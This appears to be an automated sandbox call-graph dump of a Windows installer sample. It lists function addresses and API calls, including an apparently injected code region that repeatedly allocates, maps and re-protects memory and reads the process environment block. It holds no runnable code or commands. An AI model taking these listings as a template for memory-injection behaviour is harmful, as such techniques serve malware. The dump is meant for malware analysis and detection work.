14068 405712 2 API calls 14067->14068 14069 4036e4 CloseHandle 14067->14069 14068->14067 14069->14067 14070->13994 14071->13996 14073 4062c6 5 API calls 14072->14073 14075 403258 14073->14075 14074 403262 14074->14002 14075->14074 14076 4059e6 3 API calls 14075->14076 14077 40326a 14076->14077 14078 4056dd 2 API calls 14077->14078 14079 403270 14078->14079 14080 405c36 2 API calls 14079->14080 14081 40327b 14080->14081 14081->14002 14178 405c07 GetFileAttributesW CreateFileW 14082->14178 14084 402e2e 14102 402e3e 14084->14102 14179 406032 lstrcpynW 14084->14179 14086 402e54 14087 405a32 2 API calls 14086->14087 14088 402e5a 14087->14088 14180 406032 lstrcpynW 14088->14180 14090 402e65 GetFileSize 14091 402f61 14090->14091 14104 402e7c 14090->14104 14181 402d8a 14091->14181 14093 402f6a 14095 402f9a GlobalAlloc 14093->14095 14093->14102 14193 403235 SetFilePointer 14093->14193 14094 40321f ReadFile 14094->14104 14192 403235 SetFilePointer 14095->14192 14097 402fcd 14099 402d8a 6 API calls 14097->14099 14099->14102 14100 402f83 14103 40321f ReadFile 14100->14103 14101 402fb5 14105 403027 32 API calls 14101->14105 14102->14011 14106 402f8e 14103->14106 14104->14091 14104->14094 14104->14097 14104->14102 14107 402d8a 6 API calls 14104->14107 14108 402fc1 14105->14108 14106->14095 14106->14102 14107->14104 14108->14102 14108->14108 14109 402ffe SetFilePointer 14108->14109 14109->14102 14111 406408 5 API calls 14110->14111 14112 40388f 14111->14112 14113 403895 14112->14113 14114 4038a7 14112->14114 14203 405f79 wsprintfW 14113->14203 14115 405eff 3 API calls 14114->14115 14116 4038d7 14115->14116 14118 4038f6 lstrcatW 14116->14118 14120 405eff 3 API calls 14116->14120 14119 4038a5 14118->14119 14194 403b51 14119->14194 14120->14118 14123 405aee 18 API calls 14124 403928 14123->14124 14125 4039bc 14124->14125 14127 405eff 3 API calls 14124->14127 14126 405aee 18 API calls 14125->14126 14128 4039c2 14126->14128 14129 40395a 14127->14129 14130 4039d2 LoadImageW 14128->14130 14131 406054 18 API calls 14128->14131 14129->14125 14134 40397b lstrlenW 14129->14134 14137 405a13 CharNextW 14129->14137 14132 403a78 14130->14132 14133 4039f9 RegisterClassW 14130->14133 14131->14130 14136 40140b 2 API calls 14132->14136 14135 403a2f SystemParametersInfoW CreateWindowExW 14133->14135 14165 403a82 14133->14165 14138 403989 lstrcmpiW 14134->14138 14139 4039af 14134->14139 14135->14132 14140 403a7e 14136->14140 14142 403978 14137->14142 14138->14139 14143 403999 GetFileAttributesW 14138->14143 14141 4059e6 3 API calls 14139->14141 14144 403b51 19 API calls 14140->14144 14140->14165 14145 4039b5 14141->14145 14142->14134 14146 4039a5 14143->14146 14147 403a8f 14144->14147 14204 406032 lstrcpynW 14145->14204 14146->14139 14149 405a32 2 API calls 14146->14149 14150 403a9b ShowWindow 14147->14150 14151 403b1e 14147->14151 14149->14139 14153 40639c 3 API calls 14150->14153 14152 405264 5 API calls 14151->14152 14154 403b24 14152->14154 14155 403ab3 14153->14155 14156 403b40 14154->14156 14157 403b28 14154->14157 14158 403ac1 GetClassInfoW 14155->14158 14160 40639c 3 API calls 14155->14160 14159 40140b 2 API calls 14156->14159 14163 40140b 2 API calls 14157->14163 14157->14165 14161 403ad5 GetClassInfoW RegisterClassW 14158->14161 14162 403aeb DialogBoxParamW 14158->14162 14159->14165 14160->14158 14161->14162 14164 40140b 2 API calls 14162->14164 14163->14165 14164->14165 14165->14012 14166->14016 14167->14048 14168->14017 14170 4037b9 14169->14170 14171 4037ab CloseHandle 14169->14171 14206 4037e6 14170->14206 14171->14170 14174 405823 69 API calls 14175 4035d3 OleUninitialize 14174->14175 14175->14023 14175->14024 14176->14056 14177->14067 14178->14084 14179->14086 14180->14090 14182 402d93 14181->14182 14183 402dab 14181->14183 14186 402da3 14182->14186 14187 402d9c DestroyWindow 14182->14187 14184 402db3 14183->14184 14185 402dbb GetTickCount 14183->14185 14188 406444 2 API calls 14184->14188 14189 402dc9 CreateDialogParamW ShowWindow 14185->14189 14190 402dec 14185->14190 14186->14093 14187->14186 14191 402db9 14188->14191 14189->14190 14190->14093 14191->14093 14192->14101 14193->14100 14195 403b65 14194->14195 14205 405f79 wsprintfW 14195->14205 14197 403bd6 14198 406054 18 API calls 14197->14198 14199 403be2 SetWindowTextW 14198->14199 14200 403906 14199->14200 14201 403bfe 14199->14201 14200->14123 14201->14200 14202 406054 18 API calls 14201->14202 14202->14201 14203->14119 14204->14125 14205->14197 14207 4037f4 14206->14207 14208 4037f9 FreeLibrary GlobalFree 14207->14208 14209 4037be 14207->14209 14208->14208 14208->14209 14209->14174 14333 1000103d 14334 1000101b 5 API calls 14333->14334 14335 10001056 14334->14335 14343 401000 14344 401037 BeginPaint GetClientRect 14343->14344 14345 40100c DefWindowProcW 14343->14345 14346 4010f3 14344->14346 14350 401179 14345->14350 14348 401073 CreateBrushIndirect FillRect DeleteObject 14346->14348 14349 4010fc 14346->14349 14348->14346 14351 401102 CreateFontIndirectW 14349->14351 14352 401167 EndPaint 14349->14352 14351->14352 14353 401112 6 API calls 14351->14353 14352->14350 14353->14352 15189 401e08 15190 402bbf 18 API calls 15189->15190 15191 401e0e 15190->15191 15192 402bbf 18 API calls 15191->15192 15193 401e17 15192->15193 15194 402bbf 18 API calls 15193->15194 15195 401e20 15194->15195 15196 402bbf 18 API calls 15195->15196 15197 401e29 15196->15197 15198 401423 25 API calls 15197->15198 15199 401e30 ShellExecuteW 15198->15199 15200 401e61 15199->15200 15201 40420a lstrcpynW lstrlenW 15209 1000164f 15210 10001516 GlobalFree 15209->15210 15212 10001667 15210->15212 15211 100016ad GlobalFree 15212->15211 15213 10001682 15212->15213 15214 10001699 VirtualFree 15212->15214 15213->15211 15214->15211 15229 401a15 15230 402bbf 18 API calls 15229->15230 15231 401a1e ExpandEnvironmentStringsW 15230->15231 15232 401a32 15231->15232 15234 401a45 15231->15234 15233 401a37 lstrcmpW 15232->15233 15232->15234 15233->15234 14378 10001058 14380 10001074 14378->14380 14379 100010dd 14380->14379 14381 10001516 GlobalFree 14380->14381 14382 10001092 14380->14382 14381->14382 14383 10001516 GlobalFree 14382->14383 14384 100010a2 14383->14384 14385 100010b2 14384->14385 14386 100010a9 GlobalSize 14384->14386 14387 100010b6 GlobalAlloc 14385->14387 14388 100010c7 14385->14388 14386->14385 14389 1000153d 3 API calls 14387->14389 14390 100010d2 GlobalFree 14388->14390 14389->14388 14390->14379 15242 2fa58a6 15243 2facfb4 15242->15243 15252 2fa58ad 15243->15252 15245 2facfb9 15266 2fa631e 15245->15266 15249 2fad02d 15250 2fad80a NtAllocateVirtualMemory 15249->15250 15251 2fad064 15250->15251 15253 2fae63c NtAllocateVirtualMemory 15252->15253 15254 2fa58df 15253->15254 15256 2fa30f6 15254->15256 15257 2fa598f 15254->15257 15255 2fa2fd6 NtAllocateVirtualMemory 15261 2fa30fb 15255->15261 15256->15255 15262 2fad8e0 15256->15262 15258 2fa5abb NtAllocateVirtualMemory 15257->15258 15260 2facfa5 15258->15260 15259 2fad80a NtAllocateVirtualMemory 15259->15261 15261->15259 15263 2fa5af2 15261->15263 15262->15245 15264 2fae63c NtAllocateVirtualMemory 15263->15264 15265 2fa5b01 15264->15265 15265->15245 15267 2fae63c NtAllocateVirtualMemory 15266->15267 15268 2fa633f 15267->15268 15269 2fa636a 2 API calls 15268->15269 15270 2fac76d 15269->15270 15271 2fa5c86 15270->15271 15272 2fae63c NtAllocateVirtualMemory 15271->15272 15273 2fa5cbc 15272->15273 15274 2fa5d55 15273->15274 15276 2fa313e 15273->15276 15275 2fad495 NtAllocateVirtualMemory 15274->15275 15281 2fa5d68 15275->15281 15277 2fad80a NtAllocateVirtualMemory 15276->15277 15278 2fa5af2 15276->15278 15277->15276 15279 2fae63c NtAllocateVirtualMemory 15278->15279 15280 2fa5b01 15279->15280 15280->15249 15281->15249 13483 403c1e 13484 403d71 13483->13484 13485 403c36 13483->13485 13487 403d82 GetDlgItem GetDlgItem 13484->13487 13488 403dc2 13484->13488 13485->13484 13486 403c42 13485->13486 13489 403c60 13486->13489 13490 403c4d SetWindowPos 13486->13490 13491 4040f6 19 API calls 13487->13491 13492 403e1c 13488->13492 13500 401389 2 API calls 13488->13500 13494 403c65 ShowWindow 13489->13494 13495 403c7d 13489->13495 13490->13489 13496 403dac SetClassLongW 13491->13496 13493 404142 SendMessageW 13492->13493 13512 403d6c 13492->13512 13543 403e2e 13493->13543 13494->13495 13497 403c85 DestroyWindow 13495->13497 13498 403c9f 13495->13498 13499 40140b 2 API calls 13496->13499 13552 40407f 13497->13552 13502 403ca4 SetWindowLongW 13498->13502 13503 403cb5 13498->13503 13499->13488 13501 403df4 13500->13501 13501->13492 13504 403df8 SendMessageW 13501->13504 13502->13512 13507 403cc1 GetDlgItem 13503->13507 13508 403d5e 13503->13508 13504->13512 13505 40140b 2 API calls 13505->13543 13506 404081 DestroyWindow EndDialog 13506->13552 13511 403cd4 SendMessageW IsWindowEnabled 13507->13511 13515 403cf1 13507->13515 13509 40415d 8 API calls 13508->13509 13509->13512 13510 4040b0 ShowWindow 13510->13512 13511->13512 13511->13515 13513 406054 18 API calls 13513->13543 13514 403cf6 13519 4040cf SendMessageW 13514->13519 13515->13514 13516 403cfe 13515->13516 13517 403d45 SendMessageW 13515->13517 13518 403d11 13515->13518 13516->13514 13516->13517 13517->13508 13521 403d19 13518->13521 13522 403d2e 13518->13522 13523 403d2c 13519->13523 13520 4040f6 19 API calls 13520->13543 13556 40140b 13521->13556 13525 40140b 2 API calls 13522->13525 13523->13508 13526 403d35 13525->13526 13526->13508 13526->13514 13527 4040f6 19 API calls 13528 403ea9 GetDlgItem 13527->13528 13529 403ec6 ShowWindow KiUserCallbackDispatcher 13528->13529 13530 403ebe 13528->13530 13553 404118 KiUserCallbackDispatcher 13529->13553 13530->13529 13532 403ef0 EnableWindow 13535 403f04 13532->13535 13533 403f09 GetSystemMenu EnableMenuItem SendMessageW 13534 403f39 SendMessageW 13533->13534 13533->13535 13534->13535 13535->13533 13554 40412b SendMessageW 13535->13554 13555 406032 lstrcpynW 13535->13555 13538 403f67 lstrlenW 13539 406054 18 API calls 13538->13539 13540 403f7d SetWindowTextW 13539->13540 13541 401389 2 API calls 13540->13541 13541->13543 13542 403fc1 DestroyWindow 13544 403fdb CreateDialogParamW 13542->13544 13542->13552 13543->13505 13543->13506 13543->13512 13543->13513 13543->13520 13543->13527 13543->13542 13545 40400e 13544->13545 13544->13552 13546 4040f6 19 API calls 13545->13546 13547 404019 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 13546->13547 13548 401389 2 API calls 13547->13548 13549 40405f 13548->13549 13549->13512 13550 404067 ShowWindow 13549->13550 13551 404142 SendMessageW 13550->13551 13551->13552 13552->13510 13552->13512 13553->13532 13554->13535 13555->13538 13557 401389 2 API calls 13556->13557 13558 401420 13557->13558 13558->13514 15308 402a27 SendMessageW 15309 402a41 InvalidateRect 15308->15309 15310 402a4c 15308->15310 15309->15310 14398 40242a 14399 402cc9 19 API calls 14398->14399 14400 402434 14399->14400 14401 402bbf 18 API calls 14400->14401 14402 40243d 14401->14402 14403 402448 RegQueryValueExW 14402->14403 14405 40281e 14402->14405 14404 402468 14403->14404 14406 40246e RegCloseKey 14403->14406 14404->14406 14409 405f79 wsprintfW 14404->14409 14406->14405 14409->14406 14424 403839 14425 403844 14424->14425 14426 403848 14425->14426 14427 40384b GlobalAlloc 14425->14427 14427->14426 15339 10002a7f 15340 10002a97 15339->15340 15341 1000158f 2 API calls 15340->15341 15342 10002ab2 15341->15342 14442 401cc0 14443 402ba2 18 API calls 14442->14443 14444 401cc7 14443->14444 14445 402ba2 18 API calls 14444->14445 14446 401ccf GetDlgItem 14445->14446 14447 402531 14446->14447 15343 4016c4 15344 402bbf 18 API calls 15343->15344 15345 4016ca GetFullPathNameW 15344->15345 15346 4016e4 15345->15346 15352 401706 15345->15352 15348 406375 2 API calls 15346->15348 15346->15352 15347 40171b GetShortPathNameW 15350 402a4c 15347->15350 15349 4016f6 15348->15349 15349->15352 15353 406032 lstrcpynW 15349->15353 15352->15347 15352->15350 15353->15352 15354 2fa5c7d 15355 2fa5c82 15354->15355 15356 2fa5cbc 15355->15356 15357 2fae63c NtAllocateVirtualMemory 15355->15357 15358 2fa5d55 15356->15358 15362 2fa313e 15356->15362 15357->15356 15359 2fad495 NtAllocateVirtualMemory 15358->15359 15360 2fa5d68 15359->15360 15361 2fad80a NtAllocateVirtualMemory 15361->15362 15362->15361 15363 2fa5af2 15362->15363 15364 2fae63c NtAllocateVirtualMemory 15363->15364 15365 2fa5b01 15364->15365 14448 2fa5671 14449 2fb0a44 NtMapViewOfSection 14448->14449 14450 2fa5789 14449->14450 14451 2fb0a44 NtMapViewOfSection 14450->14451 14452 2fa57cc 14451->14452 14453 2fa9169 14452->14453 14454 2fb0a44 NtMapViewOfSection 14452->14454 14455 2fa5882 14454->14455 14456 2fb0a44 NtMapViewOfSection 14455->14456 14457 2fa58a3 14456->14457 14458 4014cb 14459 405191 25 API calls 14458->14459 14460 4014d2 14459->14460 14461 2fa8675 14463 2fa30f6 14461->14463 14462 2fa2fd6 NtAllocateVirtualMemory 14464 2fa30fb 14462->14464 14463->14462 14466 2fa8848 14463->14466 14465 2fad80a NtAllocateVirtualMemory 14464->14465 14467 2fa5af2 14464->14467 14465->14464 14468 2fae63c NtAllocateVirtualMemory 14467->14468 14469 2fa5b01 14468->14469 13310 4052d0 13311 4052f1 GetDlgItem GetDlgItem GetDlgItem 13310->13311 13312 40547a 13310->13312 13356 40412b SendMessageW 13311->13356 13314 405483 GetDlgItem CreateThread CloseHandle 13312->13314 13315 4054ab 13312->13315 13314->13315 13379 405264 OleInitialize 13314->13379 13317 4054d6 13315->13317 13320 4054c2 ShowWindow ShowWindow 13315->13320 13321 4054fb 13315->13321 13316 405361 13325 405368 GetClientRect GetSystemMetrics SendMessageW SendMessageW 13316->13325 13318 4054e2 13317->13318 13319 405536 13317->13319 13322 405510 ShowWindow 13318->13322 13323 4054ea 13318->13323 13319->13321 13333 405544 SendMessageW 13319->13333 13361 40412b SendMessageW 13320->13361 13365 40415d 13321->13365 13329 405530 13322->13329 13330 405522 13322->13330 13362 4040cf 13323->13362 13331 4053d6 13325->13331 13332 4053ba SendMessageW SendMessageW 13325->13332 13328 405509 13335 4040cf SendMessageW 13329->13335 13334 405191 25 API calls 13330->13334 13336 4053e9 13331->13336 13337 4053db SendMessageW 13331->13337 13332->13331 13333->13328 13338 40555d CreatePopupMenu 13333->13338 13334->13329 13335->13319 13357 4040f6 13336->13357 13337->13336 13339 406054 18 API calls 13338->13339 13341 40556d AppendMenuW 13339->13341 13343 40558a GetWindowRect 13341->13343 13344 40559d TrackPopupMenu 13341->13344 13342 4053f9 13345 405402 ShowWindow 13342->13345 13346 405436 GetDlgItem SendMessageW 13342->13346 13343->13344 13344->13328 13347 4055b8 13344->13347 13348 405425 13345->13348 13349 405418 ShowWindow 13345->13349 13346->13328 13350 40545d SendMessageW SendMessageW 13346->13350 13351 4055d4 SendMessageW 13347->13351 13360 40412b SendMessageW 13348->13360 13349->13348 13350->13328 13351->13351 13352 4055f1 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 13351->13352 13354 405616 SendMessageW 13352->13354 13354->13354 13355 40563f GlobalUnlock SetClipboardData CloseClipboard 13354->13355 13355->13328 13356->13316 13358 406054 18 API calls 13357->13358 13359 404101 SetDlgItemTextW 13358->13359 13359->13342 13360->13346 13361->13317 13363 4040d6 13362->13363 13364 4040dc SendMessageW 13362->13364 13363->13364 13364->13321 13366 4041fe 13365->13366 13367 404175 GetWindowLongW 13365->13367 13366->13328 13367->13366 13368 404186 13367->13368 13369 404195 GetSysColor 13368->13369 13370 404198 13368->13370 13369->13370 13371 4041a8 SetBkMode 13370->13371 13372 40419e SetTextColor 13370->13372 13373 4041c0 GetSysColor 13371->13373 13374 4041c6 13371->13374 13372->13371 13373->13374 13375 4041d7 13374->13375 13376 4041cd SetBkColor 13374->13376 13375->13366 13377 4041f1 CreateBrushIndirect 13375->13377 13378 4041ea DeleteObject 13375->13378 13376->13375 13377->13366 13378->13377 13386 404142 13379->13386 13381 404142 SendMessageW 13383 4052c0 OleUninitialize 13381->13383 13382 405287 13385 4052ae 13382->13385 13389 401389 13382->13389 13385->13381 13387 40415a 13386->13387 13388 40414b SendMessageW 13386->13388 13387->13382 13388->13387 13391 401390 13389->13391 13390 4013fe 13390->13382 13391->13390 13392 4013cb MulDiv SendMessageW 13391->13392 13392->13391 13466 4014d7 13467 402ba2 18 API calls 13466->13467 13468 4014dd Sleep 13467->13468 13470 402a4c 13468->13470 15405 4022df 15406 402bbf 18 API calls 15405->15406 15407 4022ee 15406->15407 15408 402bbf 18 API calls 15407->15408 15409 4022f7 15408->15409 15410 402bbf 18 API calls 15409->15410 15411 402301 GetPrivateProfileStringW 15410->15411 14491 4048e7 14492 404913 14491->14492 14493 4048f7 14491->14493 14495 404946 14492->14495 14496 404919 SHGetPathFromIDListW 14492->14496 14502 40575b GetDlgItemTextW 14493->14502 14498 404930 SendMessageW 14496->14498 14499 404929 14496->14499 14497 404904 SendMessageW 14497->14492 14498->14495 14500 40140b 2 API calls 14499->14500 14500->14498 14502->14497 14503 100018a9 14504 100018cc 14503->14504 14505 100018ff GlobalFree 14504->14505 14506 10001911 14504->14506 14505->14506 14507 10001272 2 API calls 14506->14507 14508 10001a87 GlobalFree GlobalFree 14507->14508 15419 401ee9 15420 402bbf 18 API calls 15419->15420 15421 401ef0 15420->15421 15422 406375 2 API calls 15421->15422 15423 401ef6 15422->15423 15425 401f07 15423->15425 15426 405f79 wsprintfW 15423->15426 15426->15425 14516 2fa5a4b 14517 2fa5aa3 14516->14517 14520 2fa5abb 14517->14520 14524 2fa313e 14520->14524 14521 2fa5af2 14522 2fae63c NtAllocateVirtualMemory 14521->14522 14525 2fa5b01 14522->14525 14523 2fad80a NtAllocateVirtualMemory 14523->14524 14524->14520 14524->14521 14524->14523 14526 4014f1 SetForegroundWindow 14527 402a4c 14526->14527 15430 100016b6 15431 100016e5 15430->15431 15432 10001b18 22 API calls 15431->15432 15433 100016ec 15432->15433 15434 100016f3 15433->15434 15435 100016ff 15433->15435 15438 10001272 2 API calls 15434->15438 15436 10001726 15435->15436 15437 10001709 15435->15437 15440 10001750 15436->15440 15441 1000172c 15436->15441 15439 1000153d 3 API calls 15437->15439 15442 100016fd 15438->15442 15443 1000170e 15439->15443 15445 1000153d 3 API calls 15440->15445 15444 100015b4 3 API calls 15441->15444 15446 100015b4 3 API calls 15443->15446 15447 10001731 15444->15447 15445->15442 15448 10001714 15446->15448 15449 10001272 2 API calls 15447->15449 15450 10001272 2 API calls 15448->15450 15451 10001737 GlobalFree 15449->15451 15452 1000171a GlobalFree 15450->15452 15451->15442 15453 1000174b GlobalFree 15451->15453 15452->15442 15453->15442 14542 401cfa GetDlgItem GetClientRect 14543 402bbf 18 API calls 14542->14543 14544 401d2c LoadImageW SendMessageW 14543->14544 14545 401d4a DeleteObject 14544->14545 14546 402a4c 14544->14546 14545->14546 14210 2fb0a44 14212 2fb0a49 14210->14212 14213 2fb0a73 14212->14213 14214 2fb0b3a NtMapViewOfSection 14213->14214 14215 2fb0b68 14214->14215 14215->14215 14547 2fa8a45 14548 2fa8a9d 14547->14548 14549 2fa9169 14548->14549 14550 2fa8d70 GetPEB 14548->14550 14549->14549 14551 2fa8db6 14550->14551 14552 4014ff 14553 401507 14552->14553 14555 40151a 14552->14555 14554 402ba2 18 API calls 14553->14554 14554->14555 15482 2fa6039 15484 2fa6044 15482->15484 15483 2fa61e5 NtAllocateVirtualMemory 15483->15484 15484->15483 15485 2fa61dd 15484->15485 15486 2fa2433 15487 2fa2491 15486->15487 15487->15487 15488 2fa2559 2 API calls 15487->15488 15489 2fa2554 15488->15489 15490 2fa2559 2 API calls 15489->15490 15490->15489 14563 2fa6228 14564 2fa627f 14563->14564 14565 2fa61e5 14563->14565 14565->14564 14566 2faef94 NtAllocateVirtualMemory 14565->14566 14567 2faef8f 14566->14567 14568 2faef94 NtAllocateVirtualMemory 14567->14568 14568->14567 15503 404293 15504 4042ab 15503->15504 15508 4043c5 15503->15508 15509 4040f6 19 API calls 15504->15509 15505 40442f 15506 404501 15505->15506 15507 404439 GetDlgItem 15505->15507 15514 40415d 8 API calls 15506->15514 15510 4044c2 15507->15510 15511 404453 15507->15511 15508->15505 15508->15506 15512 404400 GetDlgItem SendMessageW 15508->15512 15513 404312 15509->15513 15510->15506 15515 4044d4 15510->15515 15511->15510 15519 404479 6 API calls 15511->15519 15534 404118 KiUserCallbackDispatcher 15512->15534 15517 4040f6 19 API calls 15513->15517 15518 4044fc 15514->15518 15520 4044ea 15515->15520 15521 4044da SendMessageW 15515->15521 15523 40431f CheckDlgButton 15517->15523 15519->15510 15520->15518 15524 4044f0 SendMessageW 15520->15524 15521->15520 15522 40442a 15525 404526 SendMessageW 15522->15525 15532 404118 KiUserCallbackDispatcher 15523->15532 15524->15518 15525->15505 15527 40433d GetDlgItem 15533 40412b SendMessageW 15527->15533 15529 404353 SendMessageW 15530 404370 GetSysColor 15529->15530 15531 404379 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 15529->15531 15530->15531 15531->15518 15532->15527 15533->15529 15534->15522 13403 402095 13404 402bbf 18 API calls 13403->13404 13405 40209c 13404->13405 13406 402bbf 18 API calls 13405->13406 13407 4020a6 13406->13407 13408 402bbf 18 API calls 13407->13408 13409 4020b0 13408->13409 13410 402bbf 18 API calls 13409->13410 13411 4020ba 13410->13411 13412 402bbf 18 API calls 13411->13412 13414 4020c4 13412->13414 13413 402103 CoCreateInstance 13418 402122 13413->13418 13414->13413 13415 402bbf 18 API calls 13414->13415 13415->13413 13416 401423 25 API calls 13417 4021e1 13416->13417 13418->13416 13418->13417 15535 2fa002f 15536 2fa006b 15535->15536 15537 2fa16d7 2 API calls 15536->15537 15538 2fa2309 15537->15538 15538->15538 15539 2fa2559 2 API calls 15538->15539 15540 2fa2554 15539->15540 15541 2fa2559 2 API calls 15540->15541 15541->15540 15549 2fa682c 15550 2fa6833 15549->15550 15551 2fb0a44 NtMapViewOfSection 15550->15551 15552 2fa68ab 15551->15552 15560 40229d 15561 4022a5 15560->15561 15562 4022ab 15560->15562 15563 402bbf 18 API calls 15561->15563 15564 402bbf 18 API calls 15562->15564 15566 4022b9 15562->15566 15563->15562 15564->15566 15565 402bbf 18 API calls 15568 4022d0 WritePrivateProfileStringW 15565->15568 15567 402bbf 18 API calls 15566->15567 15569 4022c7 15566->15569 15567->15569 15569->15565 13559 40249e 13570 402cc9 13559->13570 13561 4024a8 13562 402ba2 18 API calls 13561->13562 13563 4024b1 13562->13563 13564 4024bc 13563->13564 13565 40281e 13563->13565 13566 4024d5 RegEnumValueW 13564->13566 13567 4024c9 RegEnumKeyW 13564->13567 13566->13565 13568 4024ee RegCloseKey 13566->13568 13567->13568 13568->13565 13571 402bbf 18 API calls 13570->13571 13572 402ce2 13571->13572 13573 402cf0 RegOpenKeyExW 13572->13573 13573->13561 14576 40149e 14577 402288 14576->14577 14578 4014ac PostQuitMessage 14576->14578 14578->14577 14579 100010e1 14588 10001111 14579->14588 14580 100011d8 GlobalFree 14581 100012ba 2 API calls 14581->14588 14582 100011d3 14582->14580 14583 10001272 2 API calls 14587 100011c4 GlobalFree 14583->14587 14584 10001164 GlobalAlloc 14584->14588 14585 100011f8 GlobalFree 14585->14588 14586 100012e1 lstrcpyW 14586->14588 14587->14588 14588->14580 14588->14581 14588->14582 14588->14583 14588->14584 14588->14585 14588->14586 14588->14587 14589 401ca3 14590 402ba2 18 API calls 14589->14590 14591 401ca9 IsWindow 14590->14591 14592 401a05 14591->14592 15570 2fa641c 15571 2fa6464 15570->15571 15572 2fa646b NtMapViewOfSection 15570->15572 15572->15571 15580 2fa8c16 15581 2fa8c2d GetPEB 15580->15581 15582 2fa8d70 GetPEB 15580->15582 15585 2fa8c96 15581->15585 15584 2fa8db6 15582->15584 15585->15582 15585->15584 14593 2fa6609 14594 2fa66b0 14593->14594 14595 2fa68ab 14594->14595 14596 2fb0a44 NtMapViewOfSection 14594->14596 14597 2fa6744 14594->14597 14596->14597 14597->14595 14598 2fb0a44 NtMapViewOfSection 14597->14598 14598->14595 13849 2fa300e EnumWindows 14599 4014b8 14600 4014be 14599->14600 14601 401389 2 API calls 14600->14601 14602 4014c6 14601->14602 14638 2fad7f0 GetPEB 14639 40454a 14640 404580 14639->14640 14641 40455a 14639->14641 14643 40415d 8 API calls 14640->14643 14642 4040f6 19 API calls 14641->14642 14644 404567 SetDlgItemTextW 14642->14644 14645 40458c 14643->14645 14644->14640 14646 40194e 14647 402bbf 18 API calls 14646->14647 14648 401955 lstrlenW 14647->14648 14649 402531 14648->14649 13393 401754 13394 402bbf 18 API calls 13393->13394 13395 40175b 13394->13395 13399 405c36 13395->13399 13397 401762 13398 405c36 2 API calls 13397->13398 13398->13397 13400 405c43 GetTickCount GetTempFileNameW 13399->13400 13401 405c79 13400->13401 13402 405c7d 13400->13402 13401->13400 13401->13402 13402->13397 13458 401d56 GetDC GetDeviceCaps 13459 402ba2 18 API calls 13458->13459 13460 401d74 MulDiv ReleaseDC 13459->13460 13461 402ba2 18 API calls 13460->13461 13462 401d93 13461->13462 13463 406054 18 API calls 13462->13463 13464 401dcc CreateFontIndirectW 13463->13464 13465 402531 13464->13465 14657 40155b 14658 4029f2 14657->14658 14661 405f79 wsprintfW 14658->14661 14660 4029f7 14661->14660 13574 2fa3be4 13575 2fa3c0d 13574->13575 13576 2fa3d5f 13575->13576 13577 2faef94 NtAllocateVirtualMemory 13575->13577 13578 2faef8f 13577->13578 13579 2faef94 NtAllocateVirtualMemory 13578->13579 13579->13578 13634 2faf1da 13635 2fad80a NtAllocateVirtualMemory 13634->13635 13636 2faf1ea 13635->13636 13637 2fad80a NtAllocateVirtualMemory 13636->13637 13638 2faf1fb 13637->13638 13639 2faf207 GetPEB 13638->13639 13653 2fafc1a 13639->13653 13641 2faf817 13642 2faf29f 13642->13641 13643 2faf81e 13642->13643 13647 2faf513 13642->13647 13644 2faf8e6 13643->13644 13649 2fafa5a 13643->13649 13644->13641 13650 2fafc1a NtProtectVirtualMemory 13644->13650 13645 2fafc1a NtProtectVirtualMemory 13648 2fafc13 13645->13648 13646 2fa9169 13647->13646 13651 2fafc1a NtProtectVirtualMemory 13647->13651 13649->13645 13652 2fafa57 13650->13652 13651->13641 13654 2fafc76 NtProtectVirtualMemory 13653->13654 13654->13642 14662 401960 14663 402ba2 18 API calls 14662->14663 14664 401967 14663->14664 14665 402ba2 18 API calls 14664->14665 14666 401971 14665->14666 14667 402bbf 18 API calls 14666->14667 14668 40197a 14667->14668 14669 40198e lstrlenW 14668->14669 14671 4019ca 14668->14671 14670 401998 14669->14670 14670->14671 14675 406032 lstrcpynW 14670->14675 14673 4019b3 14673->14671 14674 4019c0 lstrlenW 14673->14674 14674->14671 14675->14673 15628 2fa25db 15629 2fa25ff 15628->15629 15630 2fad80a NtAllocateVirtualMemory 15629->15630 15631 2fa2651 15630->15631 15632 2fad80a NtAllocateVirtualMemory 15631->15632 15633 2fa2666 15632->15633 15634 2fa2679 2 API calls 15633->15634 15635 2fa313e 15634->15635 15636 2fad80a NtAllocateVirtualMemory 15635->15636 15637 2fa5af2 15635->15637 15639 2fa9169 15635->15639 15636->15635 15638 2fae63c NtAllocateVirtualMemory 15637->15638 15640 2fa5b01 15638->15640 13709 401767 13710 402bbf 18 API calls 13709->13710 13711 40176e 13710->13711 13712 401796 13711->13712 13713 40178e 13711->13713 13773 406032 lstrcpynW 13712->13773 13772 406032 lstrcpynW 13713->13772 13716 401794 13720 4062c6 5 API calls 13716->13720 13717 4017a1 13774 4059e6 lstrlenW CharPrevW 13717->13774 13724 4017b3 13720->13724 13725 4017c5 CompareFileTime 13724->13725 13726 401885 13724->13726 13735 406054 18 API calls 13724->13735 13740 406032 lstrcpynW 13724->13740 13746 40185c 13724->13746 13748 405be2 GetFileAttributesW 13724->13748 13751 405c07 GetFileAttributesW CreateFileW 13724->13751 13777 406375 FindFirstFileW 13724->13777 13780 405777 13724->13780 13725->13724 13727 405191 25 API calls 13726->13727 13729 40188f 13727->13729 13728 405191 25 API calls 13732 401871 13728->13732 13752 403027 13729->13752 13733 4018b6 SetFileTime 13734 4018c8 CloseHandle 13733->13734 13736 4018d9 13734->13736 13737 402288 13734->13737 13735->13724 13738 4018f1 13736->13738 13739 4018de 13736->13739 13737->13732 13742 406054 18 API calls 13738->13742 13741 406054 18 API calls 13739->13741 13740->13724 13744 4018e6 lstrcatW 13741->13744 13745 4018f9 13742->13745 13744->13745 13745->13737 13747 405777 MessageBoxIndirectW 13745->13747 13746->13728 13746->13732 13747->13737 13749 405c01 13748->13749 13750 405bf4 SetFileAttributesW 13748->13750 13749->13724 13750->13749 13751->13724 13753 403040 13752->13753 13754 40306e 13753->13754 13787 403235 SetFilePointer 13753->13787 13784 40321f 13754->13784 13758 4031b8 13761 4031fa 13758->13761 13764 4031bc 13758->13764 13759 40308b GetTickCount 13760 4018a2 13759->13760 13768 4030b7 13759->13768 13760->13733 13760->13734 13763 40321f ReadFile 13761->13763 13762 40321f ReadFile 13762->13768 13763->13760 13764->13760 13765 40321f ReadFile 13764->13765 13766 405cb9 WriteFile 13764->13766 13765->13764 13766->13764 13767 40310d GetTickCount 13767->13768 13768->13760 13768->13762 13768->13767 13769 403132 MulDiv wsprintfW 13768->13769 13771 405cb9 WriteFile 13768->13771 13770 405191 25 API calls 13769->13770 13770->13768 13771->13768 13772->13716 13773->13717 13775 405a02 lstrcatW 13774->13775 13776 4017a7 lstrcatW 